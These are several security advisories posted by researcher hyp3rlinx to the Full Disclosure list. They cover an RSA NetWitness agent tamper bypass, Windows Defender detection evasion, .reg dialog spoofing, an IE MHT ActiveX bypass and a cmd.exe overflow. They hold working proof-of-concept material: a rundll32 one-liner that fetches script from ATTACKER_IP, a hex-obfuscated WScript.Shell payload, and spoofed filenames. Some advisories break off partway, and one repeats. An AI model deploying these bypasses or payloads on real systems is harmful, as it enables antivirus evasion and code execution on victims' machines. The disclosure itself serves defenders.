[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] RSA Security www.netwitness.com [Product] NetWitness Endpoint EDR Agent The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibility into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response. [Vulnerability Type] Incorrect Access Control / Code Execution [CVE Reference] CVE-2022-47529 [Security Issue] CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands. Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification. Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report. SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d LANDeskService.exe [Severity] Critical [Impact(s)] Denial-of-Service Arbitrary Code Execution [Attack Vector] To exploit, open handle to memory objects held by the endpoint agent, modify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group [Affected Product Code Base] All versions prior to v12.2 [Network Access] Local [References] https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935 [Vuln Code Block]: 0001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:0001400F7B10 ; sub_14013BA50+19?p .text:0001400F7B10 ; DATA XREF: ... .text:0001400F7B10 pushrbx .text:0001400F7B12 sub rsp, 20h .text:0001400F7B16 mov rbx, rcx .text:0001400F7B19 testrcx, rcx .text:0001400F7B1C jz short loc_1400F7B5C .text:0001400F7B1E callcs:InitializeCriticalSection .text:0001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection .text:0001400F7B28 callcs:InitializeCriticalSection .text:0001400F7B2E mov edx, 1 ; bManualReset .text:0001400F7B33 xor r9d, r9d; lpName .text:0001400F7B36 mov r8d, edx; bInitialState .text:0001400F7B39 xor ecx, ecx; lpEventAttributes .text:0001400F7B3B callcs:CreateEventW .text:0001400F7B41 mov [rbx+50h], rax .text:0001400F7B45 mov dword ptr [rbx+58h], 0 .text:0001400F7B4C testrax, rax .text:0001400F7B4F jz short loc_1400F7B5C [Exploit/POC] "RSA_NetWitness_Exploit.c" #include "windows.h" #include "stdio.h" #include "accctrl.h" #include "aclapi.h" #define OPEN_ALL_ACCESS 0x1F0003 /* RSA NetWitness EDR Endpoint Agent Tamper Protection Bypass / EoP Code Execution RSA NetWitness.msi --> NWEAgent.exe MD5: c0aa7e52cbf7799161bac9ebefa38d49 Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent. Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user. By John Page (hyp3rlinx) - Nov 2022 DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse. Users of this supplied PoC code accept all risks, do no harm. X64 PE file vuln code block: 0001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:0001400F7B10 ; sub_14013BA50+19?p .text:0001400F7B10 ; DATA XREF: ... .text:0001400F7B10 pushrbx .text:0001400F7B12 sub rsp, 20h .text:0001400F7B16 mov rbx, rcx .text:0001400F7B19 testrcx, rcx .text:0001400F7B1C jz short loc_1400F7B5C .text:0001400F7B1E call
[FD] Microsoft Windows Contact File / Remote Code Execution (Resurrected) CVE-2022-44666
[-] Microsoft Windows Contact file / Remote Code Execution (Resurrected 2022) / CVE-2022-44666 [+] John Page (aka hyp3rlinx) [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec Back in 2018 I discovered three related Windows remote code execution vulnerabilities affecting both VCF and Contact files. They were purchased by Trend Micro Zero Day Initiative (@thezdi) from me and received candidate identifiers ZDI-CAN-6920 and ZDI-CAN-7591. Microsoft as usual denied a fix and it was subsequently dropped as a zero day on January 10, 2019 in coordination with the ZDI program. Almost five years passed, until researcher j00sean resurrected the flaws to add additional protocol vectors LDAP etc. Microsoft finally decided to patch and assign CVE-2022-44666 even though the vulnerabilities are exactly the same. Old 2019 advisories: = 1) Windows VCF RCE http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt 2) Windows Contact HTML injection http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt 3) Windows Contact RCE http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt Circa 2022 updated: = https://github.com/j00sean/CVE-2022-44666#readme https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-44666 Additional References: === https://www.zerodayinitiative.com/advisories/ZDI-19-013/ https://www.zdnet.com/article/poc-for-windows-vcf-zero-day-published-online/ https://thehackernews.com/2019/01/vcard-windows-hacking.html https://twitter.com/hyp3rlinx/status/1083528552253919232 https://seclists.org/bugtraq/2019/Jan/43 https://vimeo.com/312824315 https://www.exploit-db.com/exploits/46167 https://www.rapid7.com/db/modules/exploit/windows/fileformat/microsoft_windows_contact/ Special thanks to j00sean for his work and resurrecting this vulnerability from the dead and helping deal with M$ hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Microsoft Windows Defender / Detection Bypass
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender Microsoft Defender Antivirus is a major component of your next-generation protection in Microsoft Defender for Endpoint. This protection brings together machine learning, big-data analysis, in-depth threat resistance research, and the Microsoft cloud infrastructure to protect devices (or endpoints) in your organization. Microsoft Defender Antivirus is built into Windows, and it works with Microsoft Defender for Endpoint to provide protection on your device and in the cloud. [Vulnerability Type] Windows Defender Detection Bypass TrojanWin32Powessere.G - Backdoor:JS/Relvelshe.A [CVE Reference] N/A [Security Issue] Currently, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will get an "Access is denied" error message. However, it can be easily bypassed by passing an extra path traversal when referencing mshtml. C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1) Access is denied. Pass an extra "..\" to the path. C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666) Windows Defender also detects based on the following javascript call using GetObject("script:http://ATTACKER_IP/hi.tmp";). However, that interference can be bypassed by using concatenation when constructing the URL scheme portion of the payload. C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://ATTACKER_IP/hi.tmp";) Access is denied. Full bypass E.g. C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp";) Enter, Backdoor:JS/Relvelshe.A detection. Windows Defender also prevents downloaded code execution, detected as "Backdoor:JS/Relvelshe.A" and is removed by Windows Defender once it hits InetCache. "C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\hi.tmp[1]" However, this is easily bypassed by Hex encoding our payload code new ActiveXObject("WScript.Shell").Run("calc.exe"). Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to Jscripts builtin eval function. [References] Trojan:Win32/Powessere.G https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427 Backdoor:JS/Relvelshe.A https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426 Advisory: https://twitter.com/hyp3rlinx/status/1480651583172091904 [Exploit/PoC] 1) Remote code Jscript component "hi.tmp", host on server port 80, it pops calc.exe using WScript.Shell and defeats Backdoor:JS/Relvelshe.A detection. python -m http.server 80 "hi.tmp" <![CDATA[ var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229"; var str = ''; for (var n = 0; n < hex.length; n += 2) { str += String.fromCharCode(parseInt(hex.substr(n, 2), 16)); } eval(str) ]]> 2) C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp";) BOOM! [Network Access] Local [Severity] High [Disclosure Timeline] January 10, 2022 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Windows .Reg File Dialog Spoof / Mitigation Bypass
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_REG_FILE_DIALOG_SPOOF_MITIGATION_BYPASS.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values. .reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry. [Vulnerability Type] Windows .Reg File Dialog Spoof - Mitigation Bypass [CVE Reference] N/A [Security Issue] Back in 2019 I disclosed a novel way to spoof the Windows registry dialog warning box to display an attacker controlled message. This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes to abort" or whatever else an attacker would like to display. This flaw can potentially make users think they are canceling the registry import when they are in fact importing it, as we can make the registry security warning dialog box LIE to them as the warning messages are now under an attacker's control. The way it works is using a specially crafted .Reg filename, this allows control of the registry warning dialog message presented to an end user. Recently, I noticed in 2022 .Reg file dialog spoof no longer works on Windows 10, but instead triggers an access violation in Regedit.exe. Therefore, something has changed in the OS, possibly a silent mitigation hmmm. Wouldn't be the first time, back in 2016 my msinfo32.exe .NFO file XXE injection vulnerability report had a similar fate, fixed with no CVE or bulletin and that one allowed remote file access data theft. In an threatpost.com interview in 2019, Microsoft stated "The issue submitted does not meet the severity bar for servicing via a security update" Reference: https://threatpost.com/windows-bug-spoof-dialog-boxes/142711 However, the "fix" is easily bypassed and the old payload can still be made to work across systems. Bypassing .Reg spoofing fix was only the start, I had to find ways to bypass two different Windows Defender detections along the way for the PoC. Trojan:Win32/Powessere.G https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427 Backdoor:JS/Relvelshe.A https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426 Lets begin... My original .Reg file spoofing payload of 2019, now triggers an access violation and crashes regedit.exe from invalid pointer read. 7FFE7A4A7C83 | EB 0D| jmp ntdll.7FFE7A4A7C92 | 7FFE7A4A7C85 | FF C9| dec ecx | ;This loops thru to read in the path + filename 7FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ;ACCESS VIOLATION HERE 7FFE7A4A7C8C | 74 08| je ntdll.7FFE7A4A7C96 | ;Move the string down two bytes 7FFE7A4A7C8E | 49 83 C5 02 | add r13,2 | r13:L"10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" 7FFE7A4A7C92 | 85 C9| test ecx,ecx 7FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ; BOOM ACCESS VIOLATION on Win10, but not Win7 ntdll!woutput_l+0x387: 7ffe`7a4a7c87 6645395d00 cmp word ptr [r13],r11w ds:01ed`= Online search shows Win-7 still makes up about 22% of the world's computers, so I ask my friend Security researcher Eduardo Braun Prado (Edu_Braun_0day) to help me re-test the .REG file spoof on Windows 7 for completeness. Turns out my original payload still works on Win-7 and with minor tweaks on Win-10. Original works on Win-7, but crashes regedit.exe on Win-10: Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg Original payload (first mitigation bypass) works Win-7/Win-10: Remove second to last byte (%1) before the %0 string terminator and %b characters Windows_Reg_Spoof_Mitigation_Bypass.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg New payload mitigation bypass works on both Win-7 and Win-10: Windows_Reg_Spoof_Mitigation_Bypass.%n%nClick YES to cancel%0.reg However, we are NOT done yet as we must deal with Windows Defender detection preventions. 1) Trojan:Win32/Powessere.G 2) Backdoor:JS/Relvelshe.A Bypassing "Trojan:Win32/Powessere.G" = Two components required to defeat Trojan:Win32/Powessere.G detection in Windows Defender. A) extra path traversal when referencing mshtml ..\\..\\..\\ B) concat
[FD] Microsoft Internet Explorer / ActiveX Control Security Bypass
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft Internet Explorer (MSIE) Internet Explorer is a discontinued series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995. [Vulnerability Type] ActiveX Control Security Bypass [CVE Reference] N/A [Security Issue] Upon opening a specially crafted .MHT file on disk, Internet Explorer ActiveX control warnings as well as popup blocker privacy settings are not enforced. This can allow the execution of ActiveX content with zero warning to an unsuspecting end user and or force them to visit arbitrary attacker controlled websites. By default when opening browser associated files that contain active content, MSIE restricts scripts from running without explicit user interaction and permission. Instead end users are presented with a yellow warning bar on the browsers webpage, asking first if they wish to allow the running of blocked content. This prevents execution of active content scripts or controls without the user first clicking the "Allow blocked content" warning bar. However, specially crafted MHT files residing on disk that contain an invalid header directive suppress ActiveX warnings and Popup blocker privacy settings. Therefore, to bypass Internet Explorer "active content" blocking, files needs to contain an Content-Location header using an arbitrary named value E.g. "Content-Location: PBARBAR" Note, often times MHT files are set to open in IE by default and IE while discontinued it is still present on the Windows OS. Tested successfully on Windows 10 latest fully patched version with default IE security settings. Expected result: ActiveX control security warning, prevention of code execution and blocking browser popup windows. Actual result: No ActiveX control code execution blocking, security warnings or browser window popup blocking enforcement. [PoC Requirements] MHT file must reside on disk, think targeted attack scenarios. [Exploit/POC] Change [VICTIM] value below to a specified user for testing. 1) Create the MHT PoC file. "MSIE_ActiveX_Control_Security_Bypass.mht" From: Subject: Date: MIME-Version: 1.0 Content-Type: multipart/related; type="text/html"; boundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001" This is a multi-part message in MIME format. --=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001 Content-Type: text/html; charset="UTF-8" Content-Location: DOOM http://www.w3.org/TR/html4/transitional.dtd";> win=window win.open("<a rel="nofollow" href="http://www.microsoft.com","","width=600,height=600"">http://www.microsoft.com","","width=600,height=600"</a>;) var args = ['height='+1,'width='+1,].join(',') setTimeout("", 3000) var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv .hta', 'pop', args) pop.moveTo(2000,2000) --=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001-- 2) Create the PoC HTA file. "Sales_Report_2021.csv .hta" Set WshShell = CreateObject("WScript.Shell") WshShell.Run("calc.exe") 3) Open the MHT file locally. [Network Access] Local [POC/Video URL] https://www.youtube.com/watch?v=UCSqFbYUvBk [Disclosure Timeline] Vendor Notification: May 13, 2019 MSRC : July 2, 2019 "We determined that a fix for this issue will be considered in a future version of this product or service. At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case." December 5, 2021 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Windows NT Command-line Interpreter "cmd.exe" - Stack Buffer Overflow / PoC Video
https://www.youtube.com/watch?v=wYYgjV-PzD8 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Windows NT Command-line Interpreter "cmd.exe" / Stack Buffer Overflow
[+] Credits: John Page (aka hyp3rlinx, malvuln) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems. [Vulnerability Type] Stack Buffer Overflow [CVE Reference] N/A [Security Issue] Specially crafted payload will trigger a Stack Buffer Overflow in the NT Windows "cmd.exe" commandline interpreter. Requires running an already dangerous file type like .cmd or .bat. However, when cmd.exe accepts arguments using /c /k flags which execute commands specified by string, that will also trigger the buffer overflow condition. E.g. cmd.exe /c . [Memory Dump] (660.12d4): Stack buffer overflow - code c409 (first/second chance not available) ntdll!ZwWaitForMultipleObjects+0x14: 7ffb`00a809d4 c3 ret 0:000> .ecxr rax=0022 rbx=02e34d796890 rcx=7ff7c0e492c0 rdx=7ff7c0e64534 rsi=200e rdi=200c rip=7ff7c0e214f8 rsp=00f6a82ff0a0 rbp=00f6a82ff1d0 r8=200c r9=7ff7c0e60520 r10= r11= r12=02e34d77a810 r13=0002 r14=02e34d796890 r15=200d iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0202 cmd!StripQuotes+0xa8: 7ff7`c0e214f8 cc int 3 0:000> !analyze -v *** * * *Exception Analysis * * * *** Failed calling InternetOpenUrl, GLE=12029 FAULTING_IP: cmd!StripQuotes+a8 7ff7`c0e214f8 cc int 3 EXCEPTION_RECORD: -- (.exr 0x) ExceptionAddress: 7ff7c0e214f8 (cmd!StripQuotes+0x00a8) ExceptionCode: c409 (Stack buffer overflow) ExceptionFlags: 0001 NumberParameters: 1 Parameter[0]: 0008 PROCESS_NAME: cmd.exe ERROR_CODE: (NTSTATUS) 0xc409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE: (NTSTATUS) 0xc409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_PARAMETER1: 0008 MOD_LIST: NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 12d4 BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE LAST_CONTROL_TRANSFER: from 7ffafcfca9c6 to 7ffb00a809d4 STACK_TEXT: 00f6`a82fea38 7ffa`fcfca9c6 : ` ` ` ` : ntdll!ZwWaitForMultipleObjects+0x14 00f6`a82fea40 7ffa`fcfca8ae : `0098 `0096 `d22d `d22d : KERNELBASE!WaitForMultipleObjectsEx+0x106 00f6`a82fed40 7ffa`fe1d190e : ` 00f6`a82ff1d0 7ff7`c0e3e000 7ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe 00f6`a82fed80 7ffa`fe1d150f : ` ` `0003 `0001 : kernel32!WerpReportFaultInternal+0x3ce 00f6`a82feea0 7ffa`fd05976b : ` 00f6`a82ff1d0 `0004 ` : kernel32!WerpReportFault+0x73 00f6`a82feee0 7ff7`c0e26b6a : 7ff7`c0e3e000 7ff7`c0e3e000 `200e `200c : KERNELBASE!UnhandledExceptionFilter+0x35b 00f6`a82feff0 7ff7`c0e26df6 : 02e3` 7ff7`c0e1 02e3`4d796890 7ff7`c0e6602c : cmd!_raise_securityfailure+0x1a 00f6`a82ff020 7ff7`c0e214f8 : 02e3`4d77a810 ` `0002 `200e : cmd!_report_rangecheckfailure+0xf2 00f6`a82ff0a0 7ff7`c0e2096f : `200c 00f6`a82ff1d0 00f6`a82ff1d0 `200e : cmd!StripQuotes+0xa8 00f6`a82ff0d0 7ff7`c0e239a9 : 02e3`4d76ff90 02e3`4d76ff90 ` 02e3`4d76ff90 : cmd!SearchForExecutable+0x443 00f6`a82ff390 7ff7`c0e1fb9e : ` 02e3`4d76ff90 ` 02e3`4d99 : cmd!ECWork+0x69 00f6`a82ff600 7ff7`c0e1ff35 : 7ff7`c0e4fbb0 02e3`4d76ff90 0
[FD] Microsoft Windows Command-line Interpreter "cmd.exe" / Stack Buffer Overflow
[+] Credits: John Page (aka hyp3rlinx, malvuln) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems. [Vulnerability Type] Stack Buffer Overflow [CVE Reference] N/A [Security Issue] Specially crafted payload will trigger a Stack Buffer Overflow in the NT Windows "cmd.exe" commandline interpreter. Requires running an already dangerous file type like .cmd or .bat. However, when cmd.exe accepts arguments using /c /k flags which execute commands specified by string, that will also trigger the buffer overflow condition. E.g. cmd.exe /c . [Memory Dump] (660.12d4): Stack buffer overflow - code c409 (first/second chance not available) ntdll!ZwWaitForMultipleObjects+0x14: 7ffb`00a809d4 c3 ret 0:000> .ecxr rax=0022 rbx=02e34d796890 rcx=7ff7c0e492c0 rdx=7ff7c0e64534 rsi=200e rdi=200c rip=7ff7c0e214f8 rsp=00f6a82ff0a0 rbp=00f6a82ff1d0 r8=200c r9=7ff7c0e60520 r10= r11= r12=02e34d77a810 r13=0002 r14=02e34d796890 r15=200d iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0202 cmd!StripQuotes+0xa8: 7ff7`c0e214f8 cc int 3 0:000> !analyze -v *** * * *Exception Analysis * * * *** Failed calling InternetOpenUrl, GLE=12029 FAULTING_IP: cmd!StripQuotes+a8 7ff7`c0e214f8 cc int 3 EXCEPTION_RECORD: -- (.exr 0x) ExceptionAddress: 7ff7c0e214f8 (cmd!StripQuotes+0x00a8) ExceptionCode: c409 (Stack buffer overflow) ExceptionFlags: 0001 NumberParameters: 1 Parameter[0]: 0008 PROCESS_NAME: cmd.exe ERROR_CODE: (NTSTATUS) 0xc409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE: (NTSTATUS) 0xc409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_PARAMETER1: 0008 MOD_LIST: NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 12d4 BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE LAST_CONTROL_TRANSFER: from 7ffafcfca9c6 to 7ffb00a809d4 STACK_TEXT: 00f6`a82fea38 7ffa`fcfca9c6 : ` ` ` ` : ntdll!ZwWaitForMultipleObjects+0x14 00f6`a82fea40 7ffa`fcfca8ae : `0098 `0096 `d22d `d22d : KERNELBASE!WaitForMultipleObjectsEx+0x106 00f6`a82fed40 7ffa`fe1d190e : ` 00f6`a82ff1d0 7ff7`c0e3e000 7ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe 00f6`a82fed80 7ffa`fe1d150f : ` ` `0003 `0001 : kernel32!WerpReportFaultInternal+0x3ce 00f6`a82feea0 7ffa`fd05976b : ` 00f6`a82ff1d0 `0004 ` : kernel32!WerpReportFault+0x73 00f6`a82feee0 7ff7`c0e26b6a : 7ff7`c0e3e000 7ff7`c0e3e000 `200e `200c : KERNELBASE!UnhandledExceptionFilter+0x35b 00f6`a82feff0 7ff7`c0e26df6 : 02e3` 7ff7`c0e1 02e3`4d796890 7ff7`c0e6602c : cmd!_raise_securityfailure+0x1a 00f6`a82ff020 7ff7`c0e214f8 : 02e3`4d77a810 ` `0002 `200e : cmd!_report_rangecheckfailure+0xf2 00f6`a82ff0a0 7ff7`c0e2096f : `200c 00f6`a82ff1d0 00f6`a82ff1d0 `200e : cmd!StripQuotes+0xa8 00f6`a82ff0d0 7ff7`c0e239a9 : 02e3`4d76ff90 02e3`4d76ff90 ` 02e3`4d76ff90 : cmd!SearchForExecutable+0x443 00f6`a82ff390 7ff7`c0e1fb9e : ` 02e3`4d76ff90 ` 02e3`4d99 : cmd!ECWork+0x69 00f6`a82ff600 7ff7`c0e1ff35 : 7ff7`c0e4fbb0 02e3`4d76ff90 0
[FD] Recon-Informer v1.3 - Intel for offensive systems anti-reconnaissance (nmap) tool
# -*- coding: utf-8 -*- import logging,os,ctypes,sys,argparse,time,re from subprocess import * from datetime import datetime from pkgutil import iter_modules import pkg_resources #ReconInformer v1.3 Copyright (c) MIT License #By John Page (aka hyp3rlinx) #ApparitionSec #hyp3rlinx.altervista.org #twitter.com/hyp3rlinx #apparition...@gmail.com #PoC Video URL: https://www.youtube.com/watch?v=XM-G9Udbphc #== #Feb 15, 2021 #v1.3 added: using -t flag we can process packets from a specific inbound IP address of interest. #v1.3 added timestamp for the detection results in console output window. #v1.3 fix: utf-8 directive, for encoding error encountered in some older versions of Python. #v1.3 fix: check for where window size is not relevant for UDP packets to prevent errors. #v1.3 removed: script name in console window title to view CL arguments. #v1.3 suppressed: output for fragmented packets that don't show any useful info. #For best realtime console output call ReconInformer using python -u ReconInformer.py ... # #Recon Informer is a basic real-time anti-reconnaissance (nmap) detection tool for offensive #security systems, useful for penetration testers. It runs on Windows/Linux and leverages scapy. # #Purpose: #Recon-Informer is NOT meant for protecting public facing or lan critical enterprise systems whatsoever. #Its purpose is detect possible recon against our attacker system on a LAN to provide us defensive intel. #Therefore, this script is most useful for basic short-term defensive visibility. # #Features: #Attempt to detect and identify typical port scans generated using Nmap including scan type. #-sS, -sC, -F, -sR, -sT, -sA, -sW, -sN, -sF, -sX, -sM, -sZ, -sY, -sO, -sV, -sP, -sn, -f (fragment scan), -D (Decoy). # #FYI, scans such as FIN don't work well on windows OS and firewalls can make scans return incorrect result. #XMAS scans work against systems following RFC 793 for TCP/IP and don’t work against any Windows versions, #NULL is another type that don't work well on Windows. # #However, Fin, Null and Xmas scans can work on Linux machines. Therefore, Recon-Informer checks the OS #its run on and reports on scans that affect that OS, unless the -s "scan_type" flag is supplied. #With -s flag you can add extra scan types to detect that otherwise would be ignored. # #PING SWEEP (-sP, -sn, -sn -PY, -sY -PY) disabled by default. #Not enabled by default as most Nmap scans begin with an ARP who-has request, when using -p flag you #will see this detection preceding most scans. Also, you may see (noise) non-reconaissance related ARP #requests or even ones resulting from your own ICMP pings, this exclusive detection may fail if a scan uses -Pn flag. # #ICMP #Note: If nmap --disable-arp-ping flag is supplied for the scan it will be detected as ICMP ping. # #BLOCK -b offending IP(s) default is no blocking as packets can be spoofed causing DoS. #Firewall rule for blocks are in-bound "ANY" but still allows out-bound. #FW rules are named like ReconInformer_. # #DELETE FW RULE -d to remove FW rules for blocked hosts. # #WHITELIST -w HOST-IP(s) you never want to block on. # #FILTER DEST PORTS -f (filter_dst_port) cut down noisy ports like TCP 2869, NetBIOs 137 etc. #ignore packets destined for specific ports to try reduce false positive probe alerts. # #IGNORE HOST -n don't process packets from specific hosts, e.g. intranet-apps, printers and ACKS #from SMB connected shares to try reduce false positives. # #LOG -l flag, default size limit for writing to disk is 1MB. # #UDP protocol is ignored by default to try reduce false positives from sources like NetBIOS, SNMP etc. #To detect UDP scans use the -u flag, then can also combine with -f port filter #(reduce noise) on specific dest ports like 137,161,1900,2869,7680. # 